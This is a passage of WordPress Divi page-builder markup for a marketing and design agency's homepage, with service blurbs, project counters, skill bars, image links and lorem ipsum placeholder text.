use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" 